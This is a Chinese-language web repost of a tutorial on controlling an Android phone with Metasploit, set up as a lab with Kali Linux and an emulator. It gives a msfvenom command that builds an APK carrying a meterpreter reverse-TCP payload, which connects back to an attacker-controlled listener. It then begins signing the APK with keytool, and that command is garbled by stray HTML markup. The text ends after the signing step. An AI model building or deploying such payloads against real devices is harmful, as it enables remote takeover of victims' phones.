IT学习网 - 爱学习 - 最具影响力综合资讯网站 -- 中国IT界的领航者!
热门关键字:      88888  as  xxx
站外
广告
站外
广告

技术分享:如何使用Metasploit对安卓手机进行控制

发布时间:2017-01-10 17:40文章来源:互联网文章作者: 佚名点击次数:
文章内容可能具有一定攻击性,本文仅供技术交流,如有非法使用后果自负。 在这次的实验中,我会使用kali?linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。 创建负载 我们需要两台虚拟机:Kali?Linux和安卓模拟器。 打开vm启动Kali?linux。接着

文章内容可能具有一定攻击性,本文仅供技术交流,如有非法使用后果自负。

在这次的实验中,我会使用kali?linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。

创建负载

我们需要两台虚拟机:Kali?Linux和安卓模拟器。

图片1.png

打开vm启动Kali?linux。接着打开终端,使用msfvenom制作android利用程序。

247942_screenshot_1.png

Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。?Msfvenom用来制造的有效载荷用来渗透Android模拟器。

一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。

```

msfvenom?-p?android/meterpreter/reverse_tcp?LHOST=192.168.1128?LPORT=4444?R?>?/root/Desktop/pentest.apk

```

p?设置要使用的payload

LHOST?设置用来接收反弹连接的主机

LPORT?设置用来接收反弹连接的端口

R?设置文件格式

Location?要保存的文件位置

这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。

图片2.png

我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。?Android设备只安装带有签署文件的APK。

我们可以使用如下工具进行手动签名:

l?Keytool?(已安装)

l?jar?signer?(已安装)

l?zipalign?(需要安装)

执行下列命令签名。首先使用密钥工具创建密钥库。

keytool-genkey-v-keystoremy-<span class="hljs-keyword">release</span>-<span class="hljs-keyword">key</span>.Keystore-<span class="hljs-keyword">alias</span>alias_name-keyalgRSA-keysize<span class="hljs-number">2048</span>-validity<span class="hljs-number">10000</span>

图片3.png
技术分享:如何使用Metasploit对安卓手机进行控制
本文由 IT学习网 整理,转载请注明“转自IT学习网”,并附上链接。
原文链接:http://www.ourlove520.com/Article/netsafe/xitong/678690.html

标签分类:

上一篇:上一篇:智能门锁联网的安全性,能相信吗?
下一篇: 下一篇:没有了
无觅关联推荐,快速提升流量